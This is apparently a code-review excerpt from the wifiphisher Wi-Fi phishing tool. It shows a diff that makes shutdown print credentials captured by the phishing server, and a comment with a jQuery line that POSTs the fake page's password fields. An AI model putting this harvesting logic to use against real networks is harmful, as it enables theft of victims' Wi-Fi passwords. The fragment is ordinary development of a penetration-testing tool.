wifiphisher/pywifiphisher.py

```diff
@@ -187,7 +187,8 @@ def shutdown(template=None, network_manager=None):
         template.remove_extra_files()
 
     print '[' + R + '!' + W + '] Closing'
-    sys.exit(0)
+    for c in phishinghttp.creds:
+        sys.exit('[' + R + '+' + W + '] Captured credentials:' + R + c)
```

Comment:
Also, this works for me as I send POST requests like this:

`$.post('/post', 'wfphshr-wpa-password=' + value1 + '&wfphshr-second-element=' + value2 + '&wfphshr-third-element=' + value3)`

This is a one-liner that replaces the entire **post()** function.